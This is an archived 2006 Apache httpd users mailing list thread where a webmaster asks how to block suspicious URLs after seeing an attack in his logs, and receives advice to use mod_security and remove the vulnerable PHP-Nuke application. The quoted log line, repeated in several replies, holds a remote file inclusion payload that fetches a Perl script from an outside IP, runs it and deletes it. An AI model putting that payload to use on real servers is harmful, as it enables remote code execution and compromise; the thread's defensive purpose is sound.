You are viewing a plain text version of this content. The canonical link for it is here.

Posted to users@httpd.apache.org by david <dv...@gmail.com> on 2006/08/08 01:01:06 UTC

[users@httpd] Question: Apache 1.3 and SetEnvIf /RedirectMatch

Hello!

Recently, i've founded some entries on my apache webserver log like this:

[IP] - - [05/Aug/2006:02:17:47 +0200] "GET 
/nuke/index.php?config=1&base_datapath=http://210.204.138.43/cmd.txt?&cmd=cd%20/tmp/;GET%20http://210.204.138.43/WMNews.txt%20>%20WMNews.txt;perl%20WMNews.txt;rm%20WMNews*? 
HTTP/1.0" 200 220151 "-" "Mozilla/5.0"

As you can see, some attacker tries to use the index.php file to get a 
cmd.txt file from other site.

are there any way to detect this urls to stop this configuring apache?

i've tried with setEnvIf and RedirectMatch on several ways, with no results:

SetEnvIf Request_URI "(.*)cmd(.*)$" attack

or

RewriteEngine on
RedirectMatch permanent (.*)cmd(.*)$ http://nourl

only works with urls like:

http://myserver/myfile.php/cmd

not with

http://myserver/myfile.php?cmd

It seems that te Request_URI and RedirectMatch doesn't works with the 
params on the URL, only with the main URL file.

Thanks.

David



---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org

Re: [users@httpd] Question: Apache 1.3 and SetEnvIf /RedirectMatch

Posted by Joshua Slive <jo...@slive.ca>.

On 8/8/06, David Velayos <dv...@gmail.com> wrote:
>
> of course, this is not working, (you have to be authenticated to use this
> page as an admin user), but it's a useless waste of bandwidth and i think
> it's better deny the access by a common security mechanism before. The
> question is that
>
> So, with mod_security can i block supspicious urls with regexp?

Yes.

Joshua.

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org

Re: [users@httpd] Question: Apache 1.3 and SetEnvIf /RedirectMatch

Posted by David Velayos <dv...@gmail.com>.

of course, this is not working, (you have to be authenticated to use this
page as an admin user), but it's a useless waste of bandwidth and i think
it's better deny the access by a common security mechanism before. The
question is that

So, with mod_security can i block supspicious urls with regexp?

2006/8/8, Joshua Slive <jo...@slive.ca>:
>
> On 8/7/06, david <dv...@gmail.com> wrote:
> > Hello!
> >
> > Recently, i've founded some entries on my apache webserver log like
> this:
> >
> > [IP] - - [05/Aug/2006:02:17:47 +0200] "GET
> > /nuke/index.php?config=1&base_datapath=
> http://210.204.138.43/cmd.txt?&cmd=cd%20/tmp/;GET%20http://210.204.138.43/WMNews.txt%20
> >%20WMNews.txt;perl%20WMNews.txt;rm%20WMNews*?
> > HTTP/1.0" 200 220151 "-" "Mozilla/5.0"
> >
> > As you can see, some attacker tries to use the index.php file to get a
> > cmd.txt file from other site.
> >
> > are there any way to detect this urls to stop this configuring apache?
>
> If this is actually working on your server, you need to immediately
> get rid of the application that is allowing it (php-nuke it seems),
> since it has a major security flaw.
>
> In general, mod_security can be used to block suspicious URLs.  But it
> is not a substitute for making sure you only use secure web
> applications.
>
> Joshua.
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
>    "   from the digest: users-digest-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
>

Re: [users@httpd] Question: Apache 1.3 and SetEnvIf /RedirectMatch

Posted by Joshua Slive <jo...@slive.ca>.

On 8/7/06, david <dv...@gmail.com> wrote:
> Hello!
>
> Recently, i've founded some entries on my apache webserver log like this:
>
> [IP] - - [05/Aug/2006:02:17:47 +0200] "GET
> /nuke/index.php?config=1&base_datapath=http://210.204.138.43/cmd.txt?&cmd=cd%20/tmp/;GET%20http://210.204.138.43/WMNews.txt%20>%20WMNews.txt;perl%20WMNews.txt;rm%20WMNews*?
> HTTP/1.0" 200 220151 "-" "Mozilla/5.0"
>
> As you can see, some attacker tries to use the index.php file to get a
> cmd.txt file from other site.
>
> are there any way to detect this urls to stop this configuring apache?

If this is actually working on your server, you need to immediately
get rid of the application that is allowing it (php-nuke it seems),
since it has a major security flaw.

In general, mod_security can be used to block suspicious URLs.  But it
is not a substitute for making sure you only use secure web
applications.

Joshua.

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org